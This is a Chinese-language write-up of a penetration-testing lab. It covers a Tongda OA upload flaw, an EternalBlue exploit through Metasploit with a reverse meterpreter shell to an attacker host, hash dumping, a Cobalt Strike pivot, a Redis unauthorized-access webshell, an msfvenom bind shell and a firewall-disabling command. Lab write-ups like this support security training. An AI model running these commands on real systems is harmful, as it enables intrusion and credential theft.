前言
在今年的红明谷杯决赛中得知了vulntarget-a靶场(我所打的一个办公OA系统就和他这环境几乎一模一样 而且我在比赛的时候好像是校园网的原因(老背锅侠了),不管我正连反连设置payload等各种操作,这永恒之蓝都打不通,导致跳板机拿不下来后面一系列的操作都干不了……于是我就搭建了它来试试看,同时也发现了自己对后渗透一点都不熟悉(下次要是还有机会打,赛前一定打两个靶场练练手 ?
信息收集
老规矩,内网扫描一波找到目标,并通过nmap或者fscan扫描其端口发现它开着80、135、139、445、3389这些端口
访问目标可以发现是通达OA的一个系统,同时界面显示的年份是2020,说明可能存在一些比较老的nday可以利用
Web渗透
按我比赛时的思路来吧,首先查看一下通达OA的具体版本是11.3
然后通过搜索引擎查找通达OA11.3漏洞进行测试复现发现它是CNVD-2020-26562 通过抓包,改POST包,单包发送,会返回一个数据包,数据包包含了文件上传的路径。我们单包发送会在通达OA系统的文件中生成木马php文件,poc如下:
上传成功后利用文件包含执行上传的木马文件,抓包,构造payload
而在这个靶场的打靶记录中得知有个图形化工具可以一把梭哈
然后成功连上蚁剑,并查看发现内网网段是10.0.20.98(比赛的时候一读flag,web就崩?
内网渗透
从上面nmap扫描可以得知他这应该是win7的系统,所以我们可以尝试一下永恒之蓝攻击(比赛的时候试了无数次乃至重置都打不通
代码语言:javascript复制root@kali:~# msfconsole
# cowsay
____________
< metasploit >
------------
,__,
(oo)____
(__) )
||--|| *
=[ metasploit v5.0.85-dev ]
-- --=[ 2002 exploits - 1093 auxiliary - 342 post ]
-- --=[ 560 payloads - 45 encoders - 10 nops ]
-- --=[ 7 evasion ]
Metasploit tip: View useful productivity tips with the tip command, or view them all with tip -l
msf5 > search ms17-010 # 搜索永恒之蓝
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
msf5 > use 2 # 选择模块2
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.15.142 # 设置靶机IP
rhost => 192.168.15.142
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.15.140 # 设置攻击机IP
lhost => 192.168.15.140
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp # 选payload
payload => windows/x64/meterpreter/reverse_tcp
反弹shell进去hashdump得到当前用户的hash,解密得到用户密码:win7/admin
进而成功登录远程桌面
横向渗透
这里我们可以利用CS,先创建个后门,然后保存到 /tmp 目录下
接着将其传送上去,并在反弹的shell中去运行 bescon.exe 使其上线CS
再利用CS本身的一款端口扫描器跑一下,找到了另一台存活主机iIP:10.0.20.99
然后我们开始针对新扫描出的IP进行扫描等操作,先设置代理
并将其修改为CS中设置的代理
代码语言:javascript复制vim /etc/proxychains.conf
然后扫描一些这台机器的常见端口,发现它的80、6379端口的打开的
Redis未授权
先看看80端口有什么,curl一下可以看到它就只有个Hello World
再扫扫目录看看还有没有啥有用信息
这里我们可以通过3389连到那台win7直接查看,得到web目录:C:/phpStudy/PHPTutorial/WWW
或者直接设置浏览器代理进行访问
接着我们再看看6379服务,也就是针对Redis未授权访问这个漏洞进行攻击
Redis未授权访问引起主要是因为配置不当,导致未授权访问漏洞。进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。 配置不当一般主要是两个原理: 1.配置登录策略导致任意机器都可以登录 redis。 2.未设置密码或者设置弱口令。
直接连接可以成功访问,然后切换目录并写入一句话木马完成getshell
然后对蚁剑设置下代理进行连接
并且发现了10.0.10网段
正向上线msf
先生成正向shellcode
代码语言:javascript复制msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=3333 -f exe >shell.exe然后使用蚁剑上传shell.exe到10.0.20.99,并执行
kali突然出了点问题,换一个接着来配置监听器,但是一直就连不上(防火墙的原因
于是我们去用蚁剑把防火墙关闭一下
代码语言:javascript复制netsh firewall set opmode mode=disable
然后重新运行即可上线
好累,不熟悉后渗透,后面接着慢慢练~
